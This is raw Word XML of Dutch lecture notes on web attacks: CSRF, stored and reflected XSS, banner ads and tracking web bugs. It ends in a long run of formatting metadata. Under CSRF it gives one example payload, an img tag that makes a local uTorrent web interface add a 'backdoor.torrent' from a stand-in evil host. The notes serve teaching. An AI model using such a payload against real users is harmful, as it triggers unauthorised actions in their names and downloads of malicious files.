        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Op de website terechtkomen en je bent nog ingelogd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F576DF" w14:textId="5B4F34EE" w:rsidR="00146279" w:rsidRDefault="00146279" w:rsidP="009C0A1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Script voert HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00B3440A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>request uit in jouw naam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A90DA2" w14:textId="04E5D3F6" w:rsidR="008F2642" w:rsidRDefault="008F2642" w:rsidP="009C0A1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bekend CSRF attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043FB534" w14:textId="65CFCBDA" w:rsidR="00B27147" w:rsidRPr="0031211D" w:rsidRDefault="00B27147" w:rsidP="008F2642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0031211D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0031211D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:r w:rsidRPr="0031211D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> src="http://localhost:8080/gui/?action=add-url&amp;s=http://evil.example.com/backdoor.torrent"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00014483" w14:textId="02DCDC74" w:rsidR="008F2642" w:rsidRPr="008F2642" w:rsidRDefault="008F2642" w:rsidP="008F2642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2642">
        <w:rPr>
          <w:color w:val="1C1C1C"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bepaalde uTorrent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C1C1C"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> versies waren Vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D3A138" w14:textId="6E021253" w:rsidR="008F2642" w:rsidRPr="00B27147" w:rsidRDefault="008F2642" w:rsidP="008F2642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C1C1C"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Door op de link te klikken werd je administrator paswoord gewijzigd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25559E5B" w14:textId="29F88FA6" w:rsidR="006D62B8" w:rsidRDefault="00935911" w:rsidP="00935911">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="006D62B8">
        <w:t>erking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482CB936" w14:textId="77777777" w:rsidR="006D62B8" w:rsidRDefault="006D62B8" w:rsidP="006D62B8"/>
    <w:p w14:paraId="45A2179F" w14:textId="453234D8" w:rsidR="006D62B8" w:rsidRDefault="006D62B8" w:rsidP="006D62B8">
      <w:r>
        <w:t>Twee manieren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B4B937" w14:textId="052AB3EF" w:rsidR="006D62B8" w:rsidRPr="004B3F97" w:rsidRDefault="006D62B8" w:rsidP="006D62B8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4B3F97">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Stored/Persistent XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001AF940" w14:textId="34A05021" w:rsidR="006D62B8" w:rsidRDefault="006D62B8" w:rsidP="006D62B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De website zelf exploiten en een cookie-stealing script er op plaatsen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DF9D40" w14:textId="052EDE74" w:rsidR="006D62B8" w:rsidRDefault="006D62B8" w:rsidP="006D62B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hacker kan de cookies van alle users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0148127F" w14:textId="77777777" w:rsidR="00B92000" w:rsidRDefault="00B92000" w:rsidP="00B92000"/>
    <w:p w14:paraId="0CB4EBA3" w14:textId="2EDDAA67" w:rsidR="00B92000" w:rsidRDefault="00B92000" w:rsidP="00B92000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B92000">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08DEF408" wp14:editId="530895D8">
            <wp:extent cx="3306292" cy="2365041"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Picture 4" descr="diagram representing the basics of an xss at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diagram representing the basics of an xss attac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21" cy="23830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9ADA1F3" w14:textId="1E5A26CC" w:rsidR="006D62B8" w:rsidRPr="00321374" w:rsidRDefault="00321374" w:rsidP="00321374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br w:type="column"/>
      </w:r>
      <w:r w:rsidR="006D62B8" w:rsidRPr="00321374">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reflected/Non-persistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D8C63F" w14:textId="7D8D8F34" w:rsidR="006D62B8" w:rsidRDefault="006D62B8" w:rsidP="006D62B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Client injecteert onwetend code op een website, bv via een search bar</w:t>
      </w:r>
      <w:r w:rsidR="00B92000">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7E8A54" w14:textId="506145EA" w:rsidR="00B92000" w:rsidRDefault="00B92000" w:rsidP="00B92000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bv via een Email met een img in waar een URL aan gelinkt is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABBC42A" w14:textId="004613AD" w:rsidR="00B92000" w:rsidRDefault="00B92000" w:rsidP="00B92000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In de url zit een javascript file gelinkt en deze wordt geinjecteerd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF915A" w14:textId="77777777" w:rsidR="00BE5BB4" w:rsidRDefault="00BE5BB4" w:rsidP="006D62B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Webs</w:t>
      </w:r>
      <w:r w:rsidR="00A66377">
        <w:t>ite valideert de code niet goed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8BD027" w14:textId="77777777" w:rsidR="00BE5BB4" w:rsidRDefault="00BE5BB4" w:rsidP="006D62B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Website begrijpt de aanvrag niet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7218C129" w14:textId="6B9073E6" w:rsidR="006D62B8" w:rsidRDefault="00BE5BB4" w:rsidP="006D62B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00A66377">
        <w:t>lient krijgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bv een error pagina terug, maar hier zit de geinjecteerde</w:t>
      </w:r>
      <w:r w:rsidR="00A66377">
        <w:t xml:space="preserve"> code er in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8384E2" w14:textId="790FB0CC" w:rsidR="00A66377" w:rsidRDefault="008218E9" w:rsidP="006D62B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De code is “witgewassen” aangezien deze letterlijk op de website/domain staat</w:t>
      </w:r>
      <w:r w:rsidR="00DF14B1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111BF842" w14:textId="3C87EC84" w:rsidR="00DF14B1" w:rsidRDefault="00DF14B1" w:rsidP="006D62B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Code kan nu uw Cookie inlezen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D590AC7" w14:textId="77777777" w:rsidR="00B92000" w:rsidRDefault="00B92000" w:rsidP="00B92000"/>
    <w:p w14:paraId="77C0D68A" w14:textId="77777777" w:rsidR="00321374" w:rsidRDefault="00B92000" w:rsidP="00321374">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B92000">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="331E6F1E" wp14:editId="6C54A82F">
            <wp:extent cx="3864199" cy="2677948"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="Picture 6" descr="http://cdn.arstechnica.net/wp-content/uploads/2013/01/reflected-x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http://cdn.arstechnica.net/wp-content/uploads/2013/01/reflected-x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3175" r="3555" b="13295"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3887142" cy="26938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2CF852B" w14:textId="77777777" w:rsidR="00321374" w:rsidRDefault="00321374" w:rsidP="00321374">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC897DF" w14:textId="3BF360A6" w:rsidR="00B92000" w:rsidRDefault="007D2671" w:rsidP="00321374">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Bannerads / Webbugs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C04680" w14:textId="77777777" w:rsidR="007D2671" w:rsidRDefault="007D2671" w:rsidP="007D2671"/>
    <w:p w14:paraId="4DFF7465" w14:textId="5C21385B" w:rsidR="007D2671" w:rsidRDefault="007D2671" w:rsidP="007D2671">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Banneradvertenties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017BE9F5" w14:textId="77777777" w:rsidR="007D2671" w:rsidRDefault="007D2671" w:rsidP="007D2671"/>
    <w:p w14:paraId="09CB08E4" w14:textId="4DB5F552" w:rsidR="007D2671" w:rsidRDefault="007D2671" w:rsidP="007D2671">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Reclamebanners worden geladen vanuit een webserver die beheerd wordt door een reclamebureau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458D02EC" w14:textId="1CCEAC0C" w:rsidR="007D2671" w:rsidRDefault="007D2671" w:rsidP="007D2671">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>&lt;iframe src=”…”/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9D46AB" w14:textId="77777777" w:rsidR="001A440C" w:rsidRDefault="00DD3B54" w:rsidP="001A440C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Deze slaat informatie op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3598F339" w14:textId="648B02B4" w:rsidR="00DD3B54" w:rsidRDefault="001A440C" w:rsidP="001A440C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidR="00DD3B54">
        <w:t>Social engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B294350" w14:textId="77777777" w:rsidR="001F1727" w:rsidRDefault="001F1727" w:rsidP="001F1727"/>
    <w:p w14:paraId="6A2EE332" w14:textId="2DD2BB78" w:rsidR="00DD3B54" w:rsidRDefault="00DD3B54" w:rsidP="00DD3B54">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Webbug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539FA03A" w14:textId="77777777" w:rsidR="00DD3B54" w:rsidRDefault="00DD3B54" w:rsidP="00DD3B54"/>
    <w:p w14:paraId="086EC1BD" w14:textId="3389F559" w:rsidR="00DD3B54" w:rsidRDefault="003A3381" w:rsidP="00DD3B54">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kleine transparantie GIF die op dezelfde manier als een banner werkt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23489BB3" w14:textId="72D237B0" w:rsidR="003A3381" w:rsidRDefault="003A3381" w:rsidP="003A3381">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>1px*1px</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E963092" w14:textId="32680FEA" w:rsidR="003A3381" w:rsidRDefault="003A3381" w:rsidP="003A3381">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enkel zichtbaar via Inspector / Source Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12443BDB" w14:textId="73A0915C" w:rsidR="00EC0530" w:rsidRPr="00DD3B54" w:rsidRDefault="003A3381" w:rsidP="00EC0530">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Social Engineering</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00EC0530" w:rsidRPr="00DD3B54" w:rsidSect="008B500D">
      <w:footerReference w:type="even" r:id="rId22"/>
      <w:footerReference w:type="default" r:id="rId23"/>
      <w:pgSz w:w="11900" w:h="16840"/>
      <w:pgMar w:top="250" w:right="538" w:bottom="392" w:left="58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3AD0" w14:textId="77777777" w:rsidR="0011344B" w:rsidRDefault="0011344B" w:rsidP="008B500D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="25DA8123" w14:textId="77777777" w:rsidR="0011344B" w:rsidRDefault="0011344B" w:rsidP="008B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6B28" w14:textId="77777777" w:rsidR="00DB278F" w:rsidRDefault="00DB278F" w:rsidP="00DB27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08095" w14:textId="77777777" w:rsidR="00DB278F" w:rsidRDefault="00DB278F" w:rsidP="008B500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BBDE" w14:textId="77777777" w:rsidR="00DB278F" w:rsidRDefault="00DB278F" w:rsidP="00DB27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82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57124BA" w14:textId="77777777" w:rsidR="00DB278F" w:rsidRDefault="00DB278F" w:rsidP="008B50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50B3" w14:textId="77777777" w:rsidR="0011344B" w:rsidRDefault="0011344B" w:rsidP="008B500D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="057D9004" w14:textId="77777777" w:rsidR="0011344B" w:rsidRDefault="0011344B" w:rsidP="008B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74D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99AE2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>
    <w:nsid w:val="58241B13"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D74C3C78"/>
    <w:lvl w:ilvl="0" w:tplc="2D14E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9A"/>
    <w:rsid w:val="0000070B"/>
    <w:rsid w:val="000079C0"/>
    <w:rsid w:val="00014F5E"/>
    <w:rsid w:val="000175F6"/>
    <w:rsid w:val="00037472"/>
    <w:rsid w:val="00041967"/>
    <w:rsid w:val="00041E46"/>
    <w:rsid w:val="00047DEA"/>
    <w:rsid w:val="000635EE"/>
    <w:rsid w:val="000713A4"/>
    <w:rsid w:val="00073398"/>
    <w:rsid w:val="00076474"/>
    <w:rsid w:val="00085DA6"/>
    <w:rsid w:val="000951A7"/>
    <w:rsid w:val="00095AD1"/>
    <w:rsid w:val="000B16AC"/>
    <w:rsid w:val="000B73BC"/>
    <w:rsid w:val="000C39A0"/>
    <w:rsid w:val="000C5DC1"/>
    <w:rsid w:val="000D00AD"/>
    <w:rsid w:val="000D1B07"/>
    <w:rsid w:val="000D4D41"/>
    <w:rsid w:val="000E1784"/>
    <w:rsid w:val="000E434E"/>
    <w:rsid w:val="000E630A"/>
    <w:rsid w:val="000F1CE4"/>
    <w:rsid w:val="001040A4"/>
    <w:rsid w:val="0010497F"/>
    <w:rsid w:val="00105379"/>
    <w:rsid w:val="00110326"/>
    <w:rsid w:val="0011344B"/>
    <w:rsid w:val="001328BC"/>
    <w:rsid w:val="00135B0E"/>
    <w:rsid w:val="0014215A"/>
    <w:rsid w:val="00142C3E"/>
    <w:rsid w:val="0014618B"/>
    <w:rsid w:val="00146279"/>
    <w:rsid w:val="00156C38"/>
    <w:rsid w:val="00170B82"/>
    <w:rsid w:val="001759F9"/>
    <w:rsid w:val="0018509A"/>
    <w:rsid w:val="00192A89"/>
    <w:rsid w:val="00195A43"/>
    <w:rsid w:val="00196F36"/>
    <w:rsid w:val="001A440C"/>
    <w:rsid w:val="001A51E7"/>
    <w:rsid w:val="001C21C3"/>
    <w:rsid w:val="001D21D1"/>
    <w:rsid w:val="001E1886"/>
    <w:rsid w:val="001E74DC"/>
    <w:rsid w:val="001F1727"/>
    <w:rsid w:val="001F4C75"/>
    <w:rsid w:val="001F6E7F"/>
    <w:rsid w:val="00205591"/>
    <w:rsid w:val="00205B81"/>
    <w:rsid w:val="002118ED"/>
    <w:rsid w:val="00214337"/>
    <w:rsid w:val="00214D6D"/>
    <w:rsid w:val="00224C71"/>
    <w:rsid w:val="00224CFA"/>
    <w:rsid w:val="002331A9"/>
    <w:rsid w:val="0023428E"/>
    <w:rsid w:val="00234E6D"/>
    <w:rsid w:val="00244A70"/>
    <w:rsid w:val="00250F21"/>
    <w:rsid w:val="0025245B"/>
    <w:rsid w:val="00255910"/>
    <w:rsid w:val="00260692"/>
    <w:rsid w:val="00271108"/>
    <w:rsid w:val="00290F91"/>
    <w:rsid w:val="00292423"/>
    <w:rsid w:val="002A352D"/>
    <w:rsid w:val="002A3D53"/>
    <w:rsid w:val="002B6716"/>
    <w:rsid w:val="002C0CA6"/>
    <w:rsid w:val="002D2E65"/>
    <w:rsid w:val="002D6463"/>
    <w:rsid w:val="002E3A5D"/>
    <w:rsid w:val="002E456F"/>
    <w:rsid w:val="002F0C2D"/>
    <w:rsid w:val="00300BE8"/>
    <w:rsid w:val="00301DBA"/>
    <w:rsid w:val="003022AD"/>
    <w:rsid w:val="00306763"/>
    <w:rsid w:val="003069F7"/>
    <w:rsid w:val="00306D47"/>
    <w:rsid w:val="0031078E"/>
    <w:rsid w:val="0031211D"/>
    <w:rsid w:val="00321374"/>
    <w:rsid w:val="0032537C"/>
    <w:rsid w:val="003263B9"/>
    <w:rsid w:val="00332F0F"/>
    <w:rsid w:val="0034498C"/>
    <w:rsid w:val="00350C44"/>
    <w:rsid w:val="00352AC2"/>
    <w:rsid w:val="00367F1E"/>
    <w:rsid w:val="00370634"/>
    <w:rsid w:val="00374100"/>
    <w:rsid w:val="00374CCB"/>
    <w:rsid w:val="00375824"/>
    <w:rsid w:val="0038104B"/>
    <w:rsid w:val="0038336D"/>
    <w:rsid w:val="00385B9E"/>
    <w:rsid w:val="00390499"/>
    <w:rsid w:val="003966F9"/>
    <w:rsid w:val="00396CCA"/>
    <w:rsid w:val="003A023F"/>
    <w:rsid w:val="003A3381"/>
    <w:rsid w:val="003A3E67"/>
    <w:rsid w:val="003B5618"/>
    <w:rsid w:val="003B6785"/>
    <w:rsid w:val="003C264E"/>
    <w:rsid w:val="003C4835"/>
    <w:rsid w:val="003E207A"/>
    <w:rsid w:val="003E2D0F"/>
    <w:rsid w:val="004007EE"/>
    <w:rsid w:val="00404A0B"/>
    <w:rsid w:val="00415694"/>
    <w:rsid w:val="004175C5"/>
    <w:rsid w:val="004242DA"/>
    <w:rsid w:val="00424DE5"/>
    <w:rsid w:val="00427F76"/>
    <w:rsid w:val="00431C19"/>
    <w:rsid w:val="00442234"/>
    <w:rsid w:val="00445F27"/>
    <w:rsid w:val="004537B6"/>
    <w:rsid w:val="00462A60"/>
    <w:rsid w:val="00463D92"/>
    <w:rsid w:val="0047586E"/>
    <w:rsid w:val="00483045"/>
    <w:rsid w:val="00486813"/>
    <w:rsid w:val="00490803"/>
    <w:rsid w:val="00493817"/>
    <w:rsid w:val="004A0936"/>
    <w:rsid w:val="004A510C"/>
    <w:rsid w:val="004A712B"/>
    <w:rsid w:val="004B0593"/>
    <w:rsid w:val="004B2947"/>
    <w:rsid w:val="004B3F97"/>
    <w:rsid w:val="004C1251"/>
    <w:rsid w:val="004C164F"/>
    <w:rsid w:val="004C1789"/>
    <w:rsid w:val="004C2E17"/>
    <w:rsid w:val="004C6DC8"/>
    <w:rsid w:val="004D0639"/>
    <w:rsid w:val="004D0C34"/>
    <w:rsid w:val="004D1C12"/>
    <w:rsid w:val="004E0481"/>
    <w:rsid w:val="004E77C3"/>
    <w:rsid w:val="004F629A"/>
    <w:rsid w:val="005009C8"/>
    <w:rsid w:val="005035EE"/>
    <w:rsid w:val="00513BAE"/>
    <w:rsid w:val="005173FE"/>
    <w:rsid w:val="00520FBD"/>
    <w:rsid w:val="00524C8A"/>
    <w:rsid w:val="00535440"/>
    <w:rsid w:val="005470A7"/>
    <w:rsid w:val="00547764"/>
    <w:rsid w:val="0056055D"/>
    <w:rsid w:val="0056251A"/>
    <w:rsid w:val="0056613E"/>
    <w:rsid w:val="0057482C"/>
    <w:rsid w:val="00582D06"/>
    <w:rsid w:val="005958C7"/>
    <w:rsid w:val="005A04E5"/>
    <w:rsid w:val="005B5372"/>
    <w:rsid w:val="005B5DA6"/>
    <w:rsid w:val="005C1961"/>
    <w:rsid w:val="005E2F14"/>
    <w:rsid w:val="005E3243"/>
    <w:rsid w:val="005E4F21"/>
    <w:rsid w:val="005F0139"/>
    <w:rsid w:val="005F4DBE"/>
    <w:rsid w:val="005F4FA1"/>
    <w:rsid w:val="00607E25"/>
    <w:rsid w:val="00611CE0"/>
    <w:rsid w:val="006151AC"/>
    <w:rsid w:val="006166FD"/>
    <w:rsid w:val="0062209E"/>
    <w:rsid w:val="00623A23"/>
    <w:rsid w:val="00625900"/>
    <w:rsid w:val="006304F4"/>
    <w:rsid w:val="00640F8B"/>
    <w:rsid w:val="0064149F"/>
    <w:rsid w:val="00646184"/>
    <w:rsid w:val="006465B1"/>
    <w:rsid w:val="00651C2A"/>
    <w:rsid w:val="006520FA"/>
    <w:rsid w:val="00654EC9"/>
    <w:rsid w:val="00671CD3"/>
    <w:rsid w:val="0069643B"/>
    <w:rsid w:val="006964E2"/>
    <w:rsid w:val="006A413D"/>
    <w:rsid w:val="006B7354"/>
    <w:rsid w:val="006C1FC3"/>
    <w:rsid w:val="006C77E0"/>
    <w:rsid w:val="006D0585"/>
    <w:rsid w:val="006D62B8"/>
    <w:rsid w:val="006E0A2D"/>
    <w:rsid w:val="006E11AB"/>
    <w:rsid w:val="006E1925"/>
    <w:rsid w:val="006F51C2"/>
    <w:rsid w:val="00700ADF"/>
    <w:rsid w:val="00705351"/>
    <w:rsid w:val="00705FF8"/>
    <w:rsid w:val="0070765D"/>
    <w:rsid w:val="00710AAC"/>
    <w:rsid w:val="00721317"/>
    <w:rsid w:val="00726717"/>
    <w:rsid w:val="0072774E"/>
    <w:rsid w:val="007360CF"/>
    <w:rsid w:val="00744229"/>
    <w:rsid w:val="007528A7"/>
    <w:rsid w:val="007553A1"/>
    <w:rsid w:val="00756B89"/>
    <w:rsid w:val="00763D42"/>
    <w:rsid w:val="00764D53"/>
    <w:rsid w:val="00772E74"/>
    <w:rsid w:val="00776765"/>
    <w:rsid w:val="00792813"/>
    <w:rsid w:val="0079682D"/>
    <w:rsid w:val="00797F42"/>
    <w:rsid w:val="007A30FA"/>
    <w:rsid w:val="007B6972"/>
    <w:rsid w:val="007C497C"/>
    <w:rsid w:val="007C7DE0"/>
    <w:rsid w:val="007C7F18"/>
    <w:rsid w:val="007D0D37"/>
    <w:rsid w:val="007D2662"/>
    <w:rsid w:val="007D2671"/>
    <w:rsid w:val="007E1CD8"/>
    <w:rsid w:val="007E3E8A"/>
    <w:rsid w:val="007F55A4"/>
    <w:rsid w:val="00801926"/>
    <w:rsid w:val="008047F7"/>
    <w:rsid w:val="00812ACB"/>
    <w:rsid w:val="00812CA1"/>
    <w:rsid w:val="00813129"/>
    <w:rsid w:val="00817AB9"/>
    <w:rsid w:val="008218E9"/>
    <w:rsid w:val="00823AE8"/>
    <w:rsid w:val="00832D2B"/>
    <w:rsid w:val="00834B5F"/>
    <w:rsid w:val="00837FF4"/>
    <w:rsid w:val="00843287"/>
    <w:rsid w:val="00850E27"/>
    <w:rsid w:val="00852A97"/>
    <w:rsid w:val="0086122C"/>
    <w:rsid w:val="00864F5A"/>
    <w:rsid w:val="00876205"/>
    <w:rsid w:val="00884069"/>
    <w:rsid w:val="00890804"/>
    <w:rsid w:val="00892372"/>
    <w:rsid w:val="00897027"/>
    <w:rsid w:val="0089778D"/>
    <w:rsid w:val="008A00C4"/>
    <w:rsid w:val="008A5D38"/>
    <w:rsid w:val="008B00BA"/>
    <w:rsid w:val="008B500D"/>
    <w:rsid w:val="008C6821"/>
    <w:rsid w:val="008D506B"/>
    <w:rsid w:val="008D5B70"/>
    <w:rsid w:val="008E3794"/>
    <w:rsid w:val="008E45CE"/>
    <w:rsid w:val="008E4CF6"/>
    <w:rsid w:val="008F2642"/>
    <w:rsid w:val="008F4F2C"/>
    <w:rsid w:val="00912798"/>
    <w:rsid w:val="00915EFC"/>
    <w:rsid w:val="00916E8A"/>
    <w:rsid w:val="00921BE6"/>
    <w:rsid w:val="00923144"/>
    <w:rsid w:val="00925BE1"/>
    <w:rsid w:val="009266E3"/>
    <w:rsid w:val="00930923"/>
    <w:rsid w:val="00934351"/>
    <w:rsid w:val="00935911"/>
    <w:rsid w:val="00936402"/>
    <w:rsid w:val="0093795F"/>
    <w:rsid w:val="0095454C"/>
    <w:rsid w:val="00955FFD"/>
    <w:rsid w:val="00972A6D"/>
    <w:rsid w:val="00994B6C"/>
    <w:rsid w:val="00994DA8"/>
    <w:rsid w:val="00996217"/>
    <w:rsid w:val="009964AB"/>
    <w:rsid w:val="009A0670"/>
